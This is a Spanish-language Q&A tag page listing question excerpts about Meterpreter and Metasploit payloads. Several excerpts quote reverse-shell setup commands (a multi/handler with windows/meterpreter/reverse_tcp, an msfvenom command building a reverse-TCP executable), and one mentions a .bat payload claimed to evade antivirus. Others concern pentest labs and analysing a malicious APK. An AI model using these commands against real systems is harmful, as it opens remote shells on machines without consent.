Preguntas con etiqueta 'meterpreter'

0
respuestas

Problema de carga útil de Metasploit [cerrado]

Recientemente probé una carga útil de vector shell. Un archivo de texto convertido a .bat, que es teórica y prácticamente 100% no detectable por el antivirus. Primero lo probé en mi computadora host para Kali Linux VM y funcionó, obtuve la sesió...
hecha 04.07.2015 - 20:43
0
respuestas

Meterpreter: ejecutar comando falló [cerrado]

Cuando ejecuté execute -f cmd.exe -i -H , Meterpreter me dio un error:    [-] stdapi_sys_process_execute: Error en la operación: 1 ¿Qué está causando esto y cómo resolverlo?     
hecha 02.04.2015 - 17:05
0
respuestas

¿Cómo funciona la carga útil de Metasploit con un objetivo remoto?

Tengo algunas preguntas simples. A menudo uso Metasploit en mis compromisos de pentest. Funciona bien cuando estoy dentro de una red local. Bien, sabemos que, cuando la carga útil se inyecta correctamente, nos dará una shell u otro tipo de acce...
hecha 03.05.2015 - 16:50
3
respuestas

¿Cómo puede hacer clic en un URI para infectar un host? [duplicar]

Anteriormente vi una presentación de conciencia de seguridad de la información genérica, en la que todo lo que se requería para que el presentador penetrara en una organización (con un contador de medidor / reverso) era para que alguien en el...
hecha 03.04.2017 - 07:04
2
respuestas

Meterpreter reverse_https ExitOnSession

Cuando estoy configurando las opciones para el controlador reverse_https en metasploit, ¿por qué establecería ExitOnSession en falso y SessionCommunicationTimeout en 0. No entiendo completamente el propósito? Cuando utilicé esas opciones en mete...
hecha 25.09.2016 - 16:24
1
respuesta

¿Cómo encontrar la dirección IP externa que utiliza una carga útil para conectarse al atacante?

Me encuentro apuntado con un archivo .apk malicioso. Me proporcionan algunos archivos maliciosos disfrazados de un auténtico .apk. Utilicé apktool para descompilar el archivo y recopilar información sobre el atacante. No pude encontrar ningun...
hecha 08.02.2017 - 06:29
1
respuesta

Agregar un complemento a meterpreter

Estoy intentando añadir un complemento de meterpreter, a = client.railgun.kernel32.GetLogicalDrives()["return"] # Math magic to convert the binary to letters drives = [] letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" (0..25).each do |i| test...
hecha 26.01.2014 - 16:52
1
respuesta

¿Cómo configurar correctamente el Host local en una carga útil para un usuario fuera de la subred?

Estoy entrenando con laboratorios y metasploit y hay algunas cargas útiles que puedo enviar a mi objetivo y explotar (en mi subred). Si tengo que explotar una carga útil que envié a un objetivo fuera de mi red, ¿qué opciones debo usar en la conf...
hecha 09.05.2014 - 18:57
2
respuestas

Los comandos de Meterpreter no funcionan en el shell [cerrado]

Usé use multi/handler seguido de set PAYLOAD windows/meterpreter/reverse_tcp luego set LPORT 80 y set LHOST 192.168.0.11 después de eso, hago exploit -j -z y enciendo mi máquina Windows conectada a la misma...
hecha 01.05.2018 - 01:06
2
respuestas

Carga útil de MSFvenom con opciones dinámicas

Estoy utilizando MSFvenom para exportar la carga útil de TCP inversa del meterpreter. Si bien esto funciona con msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe , s...
hecha 17.11.2017 - 06:55